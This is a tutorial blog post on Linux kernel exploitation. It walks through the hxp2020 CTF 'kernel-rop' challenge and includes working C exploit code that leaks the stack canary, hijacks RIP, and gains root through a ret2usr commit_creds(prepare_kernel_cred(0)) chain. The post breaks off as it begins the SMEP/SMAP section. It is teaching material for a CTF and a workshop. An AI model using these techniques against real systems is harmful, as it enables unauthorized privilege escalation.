Prelude

This blog post documents my forays into Linux kernel exploitation. The basis for this introduction is a challenge from the hxp2020 CTF called kernel-rop. If you want to follow along, you can either download it from the CTF page or from a local mirror.

There are already a lot of solutions to this challenge on the internet. If you came to my blog looking for such a solution, you may be disappointed. This article is rather about Linux kernel exploitation in general and uses the challenge only as an example. I chose this particular challenge because it seemed to be a good entry point into kernel exploitation.

At the end of this article you will know how common security mitigations in the kernel work and how to circumvent them. We are using qemu as emulator for the kernel and are writing an exploit for a custom kernel module. This setup is pretty common and the bug is easy to spot.

I used drafts of this blog post (and exercises derived from them) to teach a workshop about Linux kernel exploitation at my current company. I want to thank my colleagues for their valuable feedback, which resulted in me rewriting some parts of this blog post, and also for putting enough pressure on me to finally finish it.

Setup

First, we unpack the .tar.gz from the CTF and take a look at the relevant files.

vmlinuz - This contains the actual Linux kernel image.
initramfs.cpio.gz - This contains the initial ramdisk, i.e., the root file system, archived with cpio and compressed with gzip.
run.sh - This file contains the qemu command to run the VM.

What follows is a more in-depth view of the various files.

vmlinuz

This is the Linux kernel image. We can find out the version using file.

$ file vmlinuz
vmlinuz: Linux kernel x86 boot executable bzImage, version 5.9.0-rc6+ (martin@martin) #10 SMP Sun Nov 22 16:47:32 CET 2020, RO-rootFS, swap_dev 0X7, Normal VGA

The z at the end of the name indicates that the image is compressed. This is usually done with gzip, bzip2, or lzma. The decompressed image is called vmlinux. Decompression can be performed using a script from the Linux kernel that is also locally mirrored here.
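Extraction scripts of this kind typically search the image for the magic bytes of a known compressor and decompress from that position. The following is a minimal sketch of the search step for gzip only. The function name find_gzip_magic is made up for this illustration and is not taken from the kernel script.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: return the offset of the first gzip header in buf
 * (magic bytes 1f 8b, followed by compression method 08 = deflate),
 * or -1 if no such header is found. */
long find_gzip_magic(const uint8_t *buf, size_t len) {
    for (size_t i = 0; i + 3 <= len; i++) {
        if (buf[i] == 0x1f && buf[i + 1] == 0x8b && buf[i + 2] == 0x08) {
            return (long)i;
        }
    }
    return -1;
}
```

A real tool would try the data starting at each candidate offset, since these three bytes can also occur by chance, and would repeat the search for the other compression formats.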

initramfs.cpio.gz

This is the initial ramdisk, a cpio archive compressed with gzip. gzip is a well-known compression format. cpio is an archive format like tar. I encountered it back in the days when I was working as a Linux sysadmin. It is a historic format, but it is still used here.
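To make the archive format a bit more tangible: the packing script further below writes the newc variant of cpio, in which every file is preceded by a 110-byte ASCII header consisting of the magic 070701 and thirteen 8-digit hexadecimal fields. The following sketch reads the file size and the name size from such a header. The function names are hypothetical and the code does no validation beyond the magic.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define NEWC_HEADER_LEN 110  /* 6-byte magic + 13 fields of 8 hex digits */

/* Read the idx-th 8-digit hexadecimal field (0-based) of a newc header. */
static uint32_t newc_field(const char *hdr, int idx) {
    char tmp[9];
    memcpy(tmp, hdr + 6 + 8 * idx, 8);
    tmp[8] = '\0';
    return (uint32_t)strtoul(tmp, NULL, 16);
}

/* Returns 0 and fills both sizes on success, -1 if the magic does not match.
 * hdr must point to at least NEWC_HEADER_LEN bytes. */
int newc_parse(const char *hdr, uint32_t *filesize, uint32_t *namesize) {
    if (memcmp(hdr, "070701", 6) != 0) {
        return -1;
    }
    *filesize = newc_field(hdr, 6);   /* c_filesize */
    *namesize = newc_field(hdr, 11);  /* c_namesize, counts the trailing NUL */
    return 0;
}
```

The file name follows the header directly, and the file data follows the name, each padded to a multiple of four bytes.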

We can unpack this using cat initramfs.cpio.gz | gunzip | cpio --extract. We will probably have to do this multiple times, so the following script comes in handy.

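#!/bin/bash
# Unpack initramfs.cpio.gz into the directory initramfs/
mkdir -p initramfs
pushd initramfs
cp ../initramfs.cpio.gz .
# remove the copied archive again once it has been extracted
gunzip -c initramfs.cpio.gz | cpio -i && rm initramfs.cpio.gz
popd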

The content of the file system is shown in the following.

$ tree
.
├── bin
│   ├── busybox
│   └── sh -> busybox
├── etc
│   ├── init.d
│   │   └── rcS
│   ├── inittab
│   ├── motd
│   └── resolv.conf -> /proc/net/pnp
├── hackme.ko
├── init -> bin/busybox
├── root
├── sbin
└── usr
    ├── bin
    └── sbin

This is a Linux file system. motd contains a fun banner. hackme.ko is a kernel module that is vulnerable and needs to be hacked.

The file /etc/init.d/rcS contains the following important parts.

....
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
chmod 400 /proc/kallsyms

insmod /hackme.ko
chmod 666 /dev/hackme

The command echo 1 > /proc/sys/kernel/kptr_restrict obscures the kernel pointers that are exposed via /proc and other interfaces. Basically it means that kernel pointers are “usually” replaced by zeroes.

The command echo 1 > /proc/sys/kernel/dmesg_restrict restricts unprivileged users from issuing dmesg to view the kernel log. We could set this to 0 to ease debugging.

The next line, chmod 400 /proc/kallsyms, restricts access to the file /proc/kallsyms so that only root can read it. This file contains the kernel symbols, and thus read access could be used to get valid pointers into the kernel address space.

Next, the vulnerable kernel module is loaded into the kernel using insmod /hackme.ko.

The command chmod 666 /dev/hackme sets the permissions on the device /dev/hackme. This is probably a device that serves as an interface to the vulnerable kernel module hackme.ko. Hence, the goal of the challenge is probably to read and write to that device and pwn the kernel in this way.

The file /etc/inittab contains the command setuidgid 1000 sh; This gives us a shell for the normal user. We can modify this to setuidgid 0 sh in order to get a root shell. If we boot the modified initramfs, we can then access files that are helpful in debugging the exploit such as /proc/kallsyms that contains the symbols of the kernel or /sys/module/core/sections/.text that contains the address of the .text section of the kernel.

We will have to compile an exploit, include it in initramfs, compress initramfs and then run the kernel. Then we have to test the exploit and if it does not work, do all the steps again. So here is a script to automate compilation, inclusion in initramfs and compressing initramfs. This script was found here.

#!/bin/bash

# Compress initramfs with the included statically linked exploit
in=$1
out=$(echo $in | awk '{ print substr( $0, 1, length($0)-2 ) }')
gcc $in -static -o $out || exit 255
mv $out initramfs
pushd . && pushd initramfs
find . -print0 | cpio --null --format=newc -o 2>/dev/null | gzip -9 > ../initramfs.cpio.gz
popd

run.sh

This script runs the kernel and the initramfs within qemu. Its commented content is as follows.

#!/bin/sh
qemu-system-x86_64 \
    -m 128M \                     # the memory size
    -cpu kvm64,+smep,+smap \      # cpu model and enabling some mitigations
    -kernel vmlinuz \             # the kernel image
    -initrd initramfs.cpio.gz \   # the initial ramdisk
    -hdb flag.txt \         # use this file as harddisk image /dev/hdb
    -snapshot \             # write to temporary files and not disk images
    -nographic \            # disable graphical output. only command line
    -monitor /dev/null \    # redirect the monitor
    -no-reboot \            # exit instead of rebooting
    -append "console=ttyS0 kaslr kpti=1 quiet panic=1"
            # this last line specifies some boot options

Some of these arguments enable kernel security mitigations, so these are a natural next step in this exposition. Note that we can modify the mitigations within this command in order to have an easier time exploiting the kernel module.

But first a digression regarding remote debugging. If we append -s to the list of arguments, then qemu enables remote debugging on port 1234. We can connect to this port using the gdb debugger with the command target remote localhost:1234. If we add -S to the list of arguments of qemu, then the kernel is started in a suspended state. Within gdb, we can attach to this and start the kernel using continue or simply c. This allows debugging the kernel. This information is just for the sake of completeness. We do not make use of remote debugging in the remainder of this article.

Kernel Security Mitigations

As the run.sh script contained options that enable Kernel security mechanisms, we will next talk about these.

Kernel ASLR (Address Space Layout Randomization) - This is similar to ASLR in user space. The kernel is loaded at a random base address in order to prevent an attacker from jumping to functions at known addresses.
SMEP (Supervisor Mode Execution Prevention) - All userland memory pages are treated as non-executable while the processor is in kernel mode. This prevents using code from user space in kernel exploits. If we want to have arbitrary code execution in the kernel, we need to reuse code that is already inside the kernel (i.e., using a ROP chain with gadgets in the kernel). SMEP is enabled by setting bit 20 of the CR4 control register of the processor.
SMAP (Supervisor Mode Access Prevention) - Similar to SMEP. It marks all userland memory pages as non-readable and non-writable when execution is in kernel land. While the other mitigations are common to Windows and Linux, SMAP is not implemented in Windows. Like SMEP, SMAP is enabled by setting a bit in the CR4 control register of the processor, namely bit 21.
KPTI (Kernel Page Table Isolation) - This goes a step further than SMEP/SMAP. The page tables for userland and kernel land are separated. One set of page tables is used when running in kernel mode. It contains both user-mode and kernel-mode pages. A second set of page tables is used when running in user mode. It contains the full userland pages and only a minimal set of kernel-mode pages.
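Kernel crash dumps print the value of CR4, so the two bits mentioned above give a quick way to check whether SMEP and SMAP are active. A small sketch, with helper names chosen only for this example:

```c
#include <stdbool.h>
#include <stdint.h>

#define CR4_SMEP (1ULL << 20)  /* Supervisor Mode Execution Prevention */
#define CR4_SMAP (1ULL << 21)  /* Supervisor Mode Access Prevention */

/* Hypothetical helpers that test the two mitigation bits of a CR4 value. */
bool cr4_has_smep(uint64_t cr4) { return (cr4 & CR4_SMEP) != 0; }
bool cr4_has_smap(uint64_t cr4) { return (cr4 & CR4_SMAP) != 0; }
```

For the value CR4: 00000000003006f0 that shows up in the crash dumps later in this article, both helpers return true.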

Reconnaissance

After we have our setup, a natural next step is looking at the vulnerability that we are going to exploit. We already know that it is residing within the hackme.ko kernel module. Hence, let us take a look at its properties.

$ rabin2 -I hackme.ko
arch     x86
baddr    0x8000000
binsz    317877
bintype  elf
bits     64
canary   true
injprot  false
class    ELF64
compiler GCC: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0
crypto   false
endian   little
havecode true
laddr    0x0
lang     c
linenum  true
lsyms    true
machine  AMD x86-64 architecture
nx       false
os       linux
pic      false
relocs   true
relro    no
rpath    NONE
sanitize false
static   true
stripped false
subsys   linux
va       true

We can see that stack canaries are enabled in the kernel module. This is a mitigation against the exploitation of buffer overflows. A random value (the canary) is placed on the stack in the function prologue, and before the function returns, the canary is checked for modifications. A modified canary indicates stack corruption, e.g., an exploit attempt, and the kernel panics.

Disassembling the kernel module, e.g., using Ghidra or r2 reveals multiple functions.

$ r2 -A initramfs/hackme.ko
...
 -- Remember to maintain your ~/.radare_history
[0x08000064]> afl
0x08000070    1     13 sym.hackme_release
0x08000080    8    174 sym.hackme_write
0x08000140    1     13 sym.hackme_open
0x08000150    5    174 sym.hackme_read
0x08000207    1     23 sym.hackme_init
0x0800021e    1     18 sym.hackme_exit

The functions hackme_init and hackme_exit are called when the kernel module is loaded and unloaded. The functions hackme_open and hackme_release are called when /dev/hackme is opened and closed.

The function hackme_read is executed when we read from /dev/hackme. The function hackme_write is executed when we write to /dev/hackme.

Decompiling hackme_read, again using Ghidra or r2, reveals the following.

ssize_t hackme_read(file *f,char *data,size_t size,loff_t *off)

{
  long lVar1;
  size_t sVar2;
  long in_GS_OFFSET;
  undefined local_a8 [8];
  int tmp [32];

  tmp._120_8_ = *(undefined8 *)(in_GS_OFFSET + 0x28);
  __memcpy(hackme_buf,local_a8);
  if (0x1000 < size) {
    __warn_printk("Buffer overflow detected (%d < %lu)!\n",0x1000,size);
    do {
      invalidInstructionException();
    } while( true );
  }
  __check_object_size(hackme_buf,size,1);
  lVar1 = _copy_to_user(data,hackme_buf,size);
  sVar2 = 0xfffffffffffffff2;
  if (lVar1 == 0) {
    sVar2 = size;
  }
  if (tmp._120_8_ == *(long *)(in_GS_OFFSET + 0x28)) {
    return sVar2;
  }
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail();
}

There is an array of 32 ints on the stack, tmp[32], i.e., 128 bytes, but we can read up to 0x1000=4096 bytes. Thus, the function allows us to read beyond the array and hence leak the stack.

The function hackme_write is very similar. It allows us to write up to 0x1000 bytes into a 128-byte array on the stack. Hence, it allows us to overflow the stack.
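The arithmetic behind these numbers can be written down as a small sketch. It assumes a 4-byte int, as on x86-64 Linux, and takes the limit 0x1000 from the size check in the decompiled code. The helper names are made up for this illustration.

```c
#include <stddef.h>
#include <stdint.h>

#define TMP_ELEMS 32                          /* int tmp[32] in the module */
#define TMP_BYTES (TMP_ELEMS * sizeof(int))   /* 128 bytes with 4-byte int */
#define MAX_IO    0x1000                      /* upper bound checked by the module */

/* Index of the 8-byte stack slot that directly follows the buffer. */
size_t first_slot_after_buffer(void) {
    return TMP_BYTES / sizeof(uint64_t);
}

/* Number of bytes beyond the buffer that a maximal read or write touches. */
size_t max_out_of_bounds_bytes(void) {
    return MAX_IO - TMP_BYTES;
}
```

If we view the stack as an array of 64-bit values, the first slot behind the buffer has index 16, which is where the exploit code below expects the stack canary.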

Leaking the Stack

As we can leak the stack using hackme_read, we can also read the stack canary. Our code is based on this awesome writeup.

We prepare a file called leak_stack.c. This can be compiled and packed in the initramfs using the script shown above in the setup paragraph.

#include <fcntl.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char *VULN_DRV = "/dev/hackme";

int64_t global_fd = 0;

void open_dev() {
    global_fd = open(VULN_DRV, O_RDWR);
    if (global_fd < 0) {
        printf("[-] failed to open %s\n", VULN_DRV);
        exit(-1);
    } else {
        printf("[+] successfully opened %s\n", VULN_DRV);
    }
}


void leak_stack() {
    uint8_t sz = 40;
    uint64_t leak[sz];
    printf("[*] trying to leak up to %zu bytes memory\n", sizeof(leak));
    // the driver copies its own kernel stack into leak
    if (read(global_fd, leak, sizeof(leak)) < 0) {
        perror("[-] read");
        exit(-1);
    }
    for (int offset=0; offset < sz; offset++){
        printf("[+] offset %d contains value: 0x%lx \n", offset, leak[offset]);
    }
}


int main(int argc, char **argv) {
    open_dev();
    leak_stack();

    return 0;
}

Then, we can execute run.sh to start the kernel and drop into a shell within the qemu environment. If we included the compiled leak_stack.c correctly, we should find it in the root folder.

Its output looks as follows.

$ ./leak_stack
[+] successfully opened /dev/hackme
[*] trying to leak up to 320 bytes memory
[+] offset 0 contains value: 0xffffffffa773a630
[+] offset 1 contains value: 0x2a
[+] offset 2 contains value: 0x3d8f236e8e010100
[+] offset 3 contains value: 0xffff946086cae110
[+] offset 4 contains value: 0xffffad8e801bfe68
[+] offset 5 contains value: 0x4
[+] offset 6 contains value: 0xffff946086cae100
[+] offset 7 contains value: 0xffffad8e801bfef0
[+] offset 8 contains value: 0xffff946086cae100
[+] offset 9 contains value: 0xffffad8e801bfe80
[+] offset 10 contains value: 0xffffffffa728ab57
[+] offset 11 contains value: 0xffffffffa728ab57
[+] offset 12 contains value: 0xffff946086cae100
[+] offset 13 contains value: 0x0
[+] offset 14 contains value: 0x7ffe54601790
[+] offset 15 contains value: 0xffffad8e801bfea0
[+] offset 16 contains value: 0x3d8f236e8e010100
[+] offset 17 contains value: 0x140
[+] offset 18 contains value: 0x0
[+] offset 19 contains value: 0xffffad8e801bfed8
[+] offset 20 contains value: 0xffffffffa728565f
[+] offset 21 contains value: 0xffff946086cae100
[+] offset 22 contains value: 0xffff946086cae100
[+] offset 23 contains value: 0x7ffe54601790
[+] offset 24 contains value: 0x140
[+] offset 25 contains value: 0x0
[+] offset 26 contains value: 0xffffad8e801bff20
[+] offset 27 contains value: 0xffffffffa75a6507
[+] offset 28 contains value: 0xffffffffa7871d81
[+] offset 29 contains value: 0x0
[+] offset 30 contains value: 0x3d8f236e8e010100
[+] offset 31 contains value: 0xffffad8e801bff58
[+] offset 32 contains value: 0x0
[+] offset 33 contains value: 0x0
[+] offset 34 contains value: 0x0
[+] offset 35 contains value: 0xffffad8e801bff30
[+] offset 36 contains value: 0xffffffffa776330a
[+] offset 37 contains value: 0xffffad8e801bff48
[+] offset 38 contains value: 0xffffffffa6e0a157

When looking at the stack, we can see three types of entries. There are small values that look like arguments to functions, e.g., at offsets 1 and 5. Then, there are kernel addresses starting with 0xffff. Thirdly, there are stack canaries, such as the ones at offsets 2, 16, and 30. Apparently, the value at offset 2 is leftover data in the uninitialized variable tmp[32] and not a live canary, even though it looks like one.

One tutorial computes the offset of the stack canary simply through reverse engineering. Another tutorial detects the stack canary automatically by assuming that it does not start with ffff and ends in 00.
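The automatic detection can be sketched as follows. The two conditions are the ones stated above. The additional non-zero check and the function names are my own assumptions for this illustration and are not taken from either tutorial.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Heuristic: a canary ends in a zero byte and is not a kernel pointer
 * (upper 16 bits all ones). The non-zero check is an extra assumption
 * that skips empty stack slots. */
bool looks_like_canary(uint64_t v) {
    return v != 0 && (v & 0xff) == 0 && (v >> 48) != 0xffff;
}

/* Return the index of the n-th candidate (0-based) in leak, or -1. */
long find_canary(const uint64_t *leak, size_t count, size_t n) {
    for (size_t i = 0; i < count; i++) {
        if (looks_like_canary(leak[i]) && n-- == 0) {
            return (long)i;
        }
    }
    return -1;
}
```

Applied to the leak above, the candidates are the slots 2, 16, and 30. Note that values such as 0xffff946086cae100 also end in 00, so the check for the ffff prefix is not optional.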

Controlling RIP

As a next step, we want to check if we can control the instruction pointer RIP. As mentioned above, we can overwrite the stack using the function hackme_write. When this function returns, its stack frame is torn down and the context of the caller is restored. RBX, RBP, and R12 are callee-saved registers in the x64 calling convention used by Linux. The function saves them on the stack at its start and pops them again before returning, here in the order RBX, R12, RBP. Finally, the return address is popped into the instruction pointer RIP.

So we can construct a payload and write it to /dev/hackme.

#include <fcntl.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char *VULN_DRV = "/dev/hackme";

int64_t global_fd = 0;
uint64_t cookie = 0;
uint64_t cookie_off = 16;


void open_dev() {
    global_fd = open(VULN_DRV, O_RDWR);
    if (global_fd < 0) {
        printf("[-] failed to open %s\n", VULN_DRV);
        exit(-1);
    } else {
        printf("[+] successfully opened %s\n", VULN_DRV);
    }
}


void leak_cookie() {
    uint8_t sz = 40;
    uint64_t leak[sz];
    printf("[*] trying to leak up to %zu bytes memory\n", sizeof(leak));
    if (read(global_fd, leak, sizeof(leak)) < 0) {
        perror("[-] read");
        exit(-1);
    }
    cookie = leak[cookie_off];
    printf("[+] leaked cookie 0x%lx at offset %lu \n", cookie, cookie_off);
}

void control_rip() {
    uint8_t sz = 40;
    uint64_t payload[sz];
    payload[cookie_off++] = cookie;
    payload[cookie_off++] = (uint64_t) 0x4444444444444444;  // RBX
    payload[cookie_off++] = (uint64_t) 0x4343434343434343;  // R12
    payload[cookie_off++] = (uint64_t) 0x4242424242424242;  // RBP
    payload[cookie_off++] = (uint64_t) 0x4141414141414141;  // RIP
    write(global_fd, payload, sizeof(payload));
    puts("if you can read this, it did not work.");
}


int main(int argc, char **argv) {
    open_dev();
    leak_cookie();
    control_rip();

    return 0;
}

Again, we need to compile, compress the exploit into initramfs and start it with qemu using run.sh.

$ ./control_rip
[+] successfully opened /dev/hackme
[*] trying to leak up to 320 bytes memory
[+] leaked cookie 0xa19c496548ccde00 at offset 16
[    4.268641] general protection fault: 0000 [#1] SMP PTI
[    4.269235] CPU: 0 PID: 113 Comm: control_rip Tainted: G           O      5.9.0-rc6+ #10
[    4.269605] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-1.fc39 04/01/2014
[    4.270271] RIP: 0010:0x4141414141414141
[    4.270653] Code: Bad RIP value.
[    4.271015] RSP: 0018:ffffa2d5c01bfeb0 EFLAGS: 00000296
[    4.271432] RAX: 0000000000000140 RBX: 4444444444444444 RCX: 0000000000000000
[    4.271753] RDX: 00000000ffffffff RSI: ffffffffc00dc580 RDI: ffffa2d5c01bff48
[    4.272099] RBP: 4242424242424242 R08: ffffffff9c46af7a R09: ffffa2d5c01bff48
[    4.272388] R10: ffffffff9bc0a157 R11: 0000000000000000 R12: 4343434343434343
[    4.272926] R13: ffffa2d5c01bfef0 R14: 00007ffd3d05bd10 R15: ffff8c27c6caef00
[    4.273360] FS:  000000000226f380(0000) GS:ffff8c27c7a00000(0000) knlGS:0000000000000000
[    4.273834] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    4.274157] CR2: 4141414141414141 CR3: 000000000652c000 CR4: 00000000003006f0
[    4.274665] Call Trace:
[    4.275780]  ? ksys_read+0xa7/0xe0
[    4.275933]  ? exit_to_user_mode_prepare+0x31/0x180
[    4.276170]  ? __x64_sys_read+0x1a/0x20
[    4.276376]  ? do_syscall_64+0x37/0x80
[    4.276564]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[    4.276865] Modules linked in: hackme(O)
[    4.277795] ---[ end trace 348a615b394120d4 ]---
[    4.278031] RIP: 0010:0x4141414141414141
[    4.278271] Code: Bad RIP value.
[    4.278463] RSP: 0018:ffffa2d5c01bfeb0 EFLAGS: 00000296
[    4.278747] RAX: 0000000000000140 RBX: 4444444444444444 RCX: 0000000000000000
[    4.278999] RDX: 00000000ffffffff RSI: ffffffffc00dc580 RDI: ffffa2d5c01bff48
[    4.279286] RBP: 4242424242424242 R08: ffffffff9c46af7a R09: ffffa2d5c01bff48
[    4.279604] R10: ffffffff9bc0a157 R11: 0000000000000000 R12: 4343434343434343
[    4.279952] R13: ffffa2d5c01bfef0 R14: 00007ffd3d05bd10 R15: ffff8c27c6caef00
[    4.280318] FS:  000000000226f380(0000) GS:ffff8c27c7a00000(0000) knlGS:0000000000000000
[    4.280804] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    4.281200] CR2: 4141414141414141 CR3: 000000000652c000 CR4: 00000000003006f0
Segmentation fault
...

We can clearly see that we control the return address RIP, as it contains 0x4141414141414141. This is so far with all mitigations still enabled. However, as we are in kernel mode it is not immediately clear how to exploit this fact.

Privilege Escalation Without Any Mitigations: Ret2Usr

In order to make our life easier, let us first disable the security mechanisms and try to exploit the module. We can later add the security mechanisms again and build up to the full challenge.

Within run.sh instead of the last line -append "console=ttyS0 kaslr kpti=1 quiet panic=1" we write -append "console=ttyS0 nosmep nosmap nopti nokaslr quiet panic=1" in order to disable SMEP/SMAP, as well as KASLR and KPTI.

Now, we only have the stack canary to take care of. This is similar to userland exploitation with ROP chains. In userland, the goal is usually to spawn an elevated shell. In the kernel, it is the same.

There are two functions in the kernel that are usually used for elevating privileges.

prepare_kernel_cred() - This kernel function prepares a set of credentials for a kernel service and can also override the credentials of a task for delegation purposes. If we call this with 0 as argument, the returned credentials have no group and full capabilities.
commit_creds() - This kernel function installs new credentials in the current thread.

Hence, the goal is to call commit_creds(prepare_kernel_cred(0)) using a ROP chain.

We can find the addresses of these functions inside the kernel by checking /proc/kallsyms. For this we modify /etc/inittab in the initramfs to contain setuidgid 0 sh. This will drop us to a root shell, so we are allowed to read /proc/kallsyms. Don’t forget to undo these changes, or you will wonder later why your privilege escalation always works without doing anything.

# id
uid=0 gid=0 groups=0
# cat /proc/kallsyms | grep -e prepare_kernel_cred -e commit_creds
ffffffff814c6410 T commit_creds
ffffffff814c67f0 T prepare_kernel_cred

So we have the addresses that we need to put on the ROP chain.
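Instead of using grep, the lookup can also be done programmatically. The following sketch parses a single line of the form shown above. The function name kallsyms_match is hypothetical. Keep in mind that with kptr_restrict set as in this challenge, an unprivileged process does not get to see the real addresses.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Parse one /proc/kallsyms line of the form "<hex address> <type> <name>".
 * Returns 1 and stores the address if the symbol name equals wanted,
 * otherwise returns 0. */
int kallsyms_match(const char *line, const char *wanted, uint64_t *addr) {
    unsigned long long a;
    char type;
    char name[128];
    if (sscanf(line, "%llx %c %127s", &a, &type, name) != 3) {
        return 0;
    }
    if (strcmp(name, wanted) != 0) {
        return 0;
    }
    *addr = (uint64_t)a;
    return 1;
}
```

A caller would read /proc/kallsyms line by line, e.g., with fgets, and stop at the first match.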

After elevating our privileges, we need to go back to userland. For this we need the assembly instruction swapgs followed by either iretq or sysretq.

swapgs - GS is one of the segment registers, like CS (Code Segment), DS (Data Segment), or SS (Stack Segment). Historically, these registers pointed to the respective segments of a program. In 64-bit mode, segmentation is mostly unused, but FS and GS still carry a base address whose purpose is not specified by the CPU manufacturer and thus can be chosen by the programmers of the operating system. FS and GS are used by Linux and Windows to access thread-specific or CPU-specific storage. As an example, in Windows, the Thread Environment Block (TEB) can be found at a fixed offset from FS or GS, depending on whether the architecture is 32 or 64 bit. In the Linux kernel, GS points to per-CPU data, which is also where the stack canary at offset 0x28 from GS in the decompiled code above comes from. swapgs exchanges the current GS base with a second value that the CPU stores in a model-specific register. To make a long story short, we must execute swapgs when entering user mode from kernel mode or vice versa.
iretq/sysretq - Either of these instructions can be used to perform the actual switch from kernel mode to user mode. iretq is easier to use, as it only requires the stack to be set up with five values for userland in the order RIP, CS, RFLAGS, SP, SS. sysretq instead takes the return address for RIP from RCX and the value for RFLAGS from R11. In addition, bits 48 to 63 of the return address need to be the same as bit 47, i.e., the address must be canonical. Otherwise, we get a general protection fault.
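Two details from this list can be made concrete in a short sketch: the layout of the five values that iretq pops from the stack, and the check for a canonical address. The struct and function names are chosen for this example only, and the check assumes 48-bit virtual addresses (four-level paging).

```c
#include <stdbool.h>
#include <stdint.h>

/* Stack layout consumed by iretq, lowest address (top of stack) first. */
struct iret_frame {
    uint64_t rip;     /* where execution continues in userland */
    uint64_t cs;      /* user code segment selector */
    uint64_t rflags;  /* user flags */
    uint64_t rsp;     /* user stack pointer */
    uint64_t ss;      /* user stack segment selector */
};

/* An address is canonical if bits 48..63 all equal bit 47. */
bool is_canonical(uint64_t addr) {
    uint64_t upper = addr >> 47;  /* bits 47..63, i.e., 17 bits */
    return upper == 0 || upper == 0x1ffff;
}
```

The test value 0x4141414141414141 from the previous section is not canonical, which is consistent with the general protection fault in the crash dump.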

Executing these instructions can be done in our exploit code using inline assembly. We do not even need a ROP chain for that: as we have disabled SMEP/SMAP, the kernel can directly execute code that lives in our user-space process.

Note that when we revert back to user mode with iretq/sysretq we need to set the registers. Hence, before doing this dance, we have to store the userland registers in order to be able to revert them later.

This can be done as follows.

uint64_t user_cs, user_ss, user_rflags, user_sp;

void save_state(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
    puts("[*] Saved state");
}

Now we can put everything together. The following code is the full exploit for a kernel without any mitigations except stack canaries.

#include <fcntl.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char *VULN_DRV = "/dev/hackme";

int64_t global_fd = 0;
uint64_t cookie = 0;
uint64_t cookie_off = 16;

uint64_t user_cs, user_ss, user_rflags, user_sp;     // for storing the registers
uint64_t prepare_kernel_cred = 0xffffffff814c67f0;   // the address from /proc/kallsyms
uint64_t commit_creds = 0xffffffff814c6410;

void open_dev(){
    global_fd = open(VULN_DRV, O_RDWR);
    if (global_fd < 0) {
        printf("[-] failed to open %s\n", VULN_DRV);
        exit(-1);
    } else {
        printf("[+] successfully opened %s\n", VULN_DRV);
    }
}

void leak_cookie() {
    uint8_t sz = 40;
    uint64_t leak[sz];
    printf("[*] trying to leak up to %zu bytes memory\n", sizeof(leak));
    if (read(global_fd, leak, sizeof(leak)) < 0) {
        perror("[-] read");
        exit(-1);
    }
    cookie = leak[cookie_off];
    printf("[+] leaked cookie 0x%lx at offset %lu \n", cookie, cookie_off);
}

void save_state(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
    puts("[*] Saved state");
}

void payload(){
    uid_t uid = getuid();
    if (uid == 0) {
        printf("[+] we are root (uid = %d)\n", uid);
    } else {
        printf("[!] we are not root (uid: %d)\n", uid);
        exit(-1);
    }
    execl("/bin/sh", "sh", NULL);
}

uint64_t user_rip = (uint64_t) payload;     // the last part of our ROP chain

void privesc(){
    __asm__(".intel_syntax noprefix;"
            "movabs rax, prepare_kernel_cred;"
            "xor rdi, rdi;"
            "call rax;"            // execute prepare_kernel_cred(0)
            "mov rdi, rax;"        // put the return value into rdi
            "movabs rax, commit_creds;"
            "call rax;"            // execute commit_creds
            "swapgs;"              // swap GS register
            "mov r15, user_ss;"    // restore the registers from user mode
            "push r15;"
            "mov r15, user_sp;"
            "push r15;"
            "mov r15, user_rflags;"
            "push r15;"
            "mov r15, user_cs;"
            "push r15;"
            "mov r15, user_rip;"   // return to the payload
            "push r15;"
            "iretq;"               // switch from kernel to userland
            ".att_syntax;");
}

void overflow_stack(){
    uint8_t sz = 40;
    uint64_t payload[sz];
    payload[cookie_off++] = cookie;
    payload[cookie_off++] = (uint64_t) 0;  // RBX
    payload[cookie_off++] = (uint64_t) 0;  // R12
    payload[cookie_off++] = (uint64_t) 0;  // RBP
    payload[cookie_off++] = (uint64_t) privesc;  // RIP
    write(global_fd, payload, sizeof(payload));
    puts("if you can read this, it did not work.");
}

int main(int argc, char **argv){
    open_dev();
    save_state();
    leak_cookie();
    overflow_stack();
    return 0;
}

Executing this code looks as follows.

$ ./no_mitigations
[+] successfully opened /dev/hackme
[*] Saved state
[*] trying to leak up to 320 bytes memory
[+] leaked cookie 0x2aa741ea8a7daa00 at offset 16
[+] we are root (uid = 0)
/ # id
uid=0 gid=0

As we see the message [+] we are root (uid = 0) in the output of our exploit, the elevation of privileges worked.

Note that in the payload, instead of execl("/bin/sh", "sh", NULL); we could also write system("/bin/sh");. This solution can be found in different writeups, but in my tests, it did not work and led to a segmentation fault. I have no idea why this does not work. If you read this and know why it happens, please let me know. I will edit this section when I find out.

Adding SMEP/SMAP

Next, we will add the mitigations SMEP/SMAP and again try to exploit the kernel module. Remember that SMEP/SMAP stand for Supervisor Mode Execution/Access Prevention and mark memory pages from userland as non-executable/non-accessible as long as we are in kernel mode. Hence, our exploit will not work anymore, as the inline assembly we wrote lives in user space, but we execute it from kernel mode. SMEP forbids exactly that.

To enable SMEP/SMAP, we modify the last line of the original run.sh as follows: -append "console=ttyS0 nopti nokaslr quiet panic=1".

Running the previous exploit yields an error message.

$ ./no_mitigations
[+] successfully opened /dev/hackme
[*] Saved state
[*] trying to leak up to 320 bytes memory
